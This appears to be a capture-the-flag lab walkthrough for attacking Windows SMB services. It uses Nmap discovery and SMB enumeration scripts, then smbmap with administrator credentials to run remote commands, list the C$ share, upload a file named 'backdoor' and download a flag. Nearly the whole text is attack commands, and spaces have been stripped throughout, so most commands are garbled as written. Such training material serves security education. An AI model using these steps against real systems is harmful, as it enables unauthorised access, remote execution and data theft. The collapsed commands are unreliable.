# Learn to use Nmap to scan the target machine and mount the SMB share of the target machine using the Windows File Explorer as well as using the command prompt.# Checking the IP address.ipconfig# Run Nmap scan against the subnet to discover the target machine’s IP address.# Nmap --open option would show only exposed ports of the live hosts.nmap10.2.16.0/20--open# Clear the stored session.netuse*/delete# Mount the target folder.netuseZ:\\10.0.22.92\C$smbserver_771/user:administrator
# Your task is to fingerprint the service using the tools available on the Kali machine and run Nmap scripts to enumerate the Windows target machine SMB service.# Checking the target IP address.cat/root/Desktop/target
# Ping the target machine to see if it’s alive or not.# We can observe that the target machine is alive and we have successfully sent and received all five packets.ping-c510.2.28.180
# Run a Nmap scan against the target IP.nmap10.2.28.180
# We have discovered that multiple ports are open. SMB port 445 is also exposed. We will run the Nmap script to list the supported protocols and dialects of an SMB server.nmap-p445--scriptsmb-protocols10.2.28.180
# Running security mode script to return the information about the SMB security level.# We have tried to access the target SMB server using a guest user and we have received SMB security level information.nmap-p445--scriptsmb-security-mode10.2.28.180
# We have the SMB server credentials i.e administrator:smbserver_771. We will use it with Nmap script to scan the target to discover sensitive information.# Enumerating the users logged into a system through an SMB share with Nmap script.# First, we won’t use any credentials to see the output.nmap-p445--scriptsmb-enum-sessions10.2.28.180
# In case guest login is not enabled we can always use valid credentials of the target machine to discover the same information.nmap-p445--scriptsmb-enum-sessions--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Enumerating all available shares.nmap-p445--scriptsmb-enum-shares10.2.28.180
# "The IPC$ share is also known as a null session connection. By using this session, Windows lets anonymous users perform certain activities, such as enumerating the names of domain accounts and network shares."# Scanning all shares using valid credentials to check the permissions.nmap-p445--scriptsmb-enum-shares--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Enumerate the windows users on a target machine.nmap-p445--scriptsmb-enum-users--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Get information about the server statistics. It uses port 445 and port 139 to fetch the details.nmap-p445--scriptsmb-server-stats--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Enumerating available domains on a target machine.nmap-p445--scriptsmb-enum-domains--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Enumerating available user groups on a target machine.nmap-p445--scriptsmb-enum-groups--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Enumerating services on a target machine.nmap-p445--scriptsmb-enum-services--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Enumerating all the shared folders and drives then running the ls command (The ls command is used to list files or directories, similarly dir in windows) on all the shared folders.nmap-p445--scriptsmb-enum-shares,smb-ls--script-argssmbusername=administrator,smbpassword=smbserver_77110.2.28.180
# Your task is to fingerprint the service using the tools available on the Kali machine and run the smbmap tool to enumerate the target machine service.# Checking the target IP address.cat/root/Desktop/target
# Run a Nmap scan against the target IP.nmap10.2.24.213
# We have discovered that multiple ports are open. SMB port 445 is also exposed. We will run Nmap script to list the supported protocols and dialects of an SMB server.nmap-p445--scriptsmb-protocols10.2.24.213
# We will use the smbmap python script to enumerate the target machine.# Running smbmap tool to discover all shared folders and drives.smbmap-uguest-p""-d.-H10.2.24.213
# Running smbmap with administrator user credentials.smbmap-uadministrator-psmbserver_771-d.-H10.2.24.213
# Execute the command on the target machine through SMB.smbmap-H10.2.24.213-uadministrator-psmbserver_771-x'ipconfig'# Listing all drives on the specified host.smbmap-H10.2.24.213-uadministrator-psmbserver_771-L
# List contents of the directory of C:\ drive.smbmap-H10.2.24.213-uadministrator-psmbserver_771-r'C$'# We can also upload a file using the smbmap tool if we have the write permission on the shared folder.# Uploading a sample file.touchbackdoor
smbmap-H10.2.24.213-uadministrator-psmbserver_771--upload'/root/backdoor''C$\backdoor'# Verify that the files have been uploaded on the target machine.smbmap-H10.2.24.213-uadministrator-psmbserver_771-r'C$'# Download the flag.txt file.smbmap-H10.2.24.213-uadministrator-psmbserver_771--download'C$\flag.txt'cat/root/10.2.24.213-C_flag.txt